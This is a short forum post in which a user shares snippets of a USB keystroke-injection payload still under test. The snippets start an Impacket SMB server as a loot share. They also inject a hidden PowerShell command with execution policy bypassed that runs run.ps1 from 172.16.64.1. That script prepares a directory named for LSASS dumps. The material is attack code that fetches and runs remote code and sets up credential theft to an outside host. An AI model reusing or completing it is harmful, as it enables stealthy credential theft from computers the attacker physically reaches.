Yes that is what I did: here are some snippets from the payload I am working on:
In Payload.txt, do not forget to install tools...
/pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump
QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\""
In my powershell script 'Run.ps1':
#Wait for SMB to get going
while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){
Start-Sleep 2
$I++
if ($I -eq 10) {break} # dont wait too long.....
}
# Loot Directory
[String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\'
if (!(Test-Path $P)) {New-Item -Path $P -type directory | Out-Null}
I haven't published as I am still testing but these should help.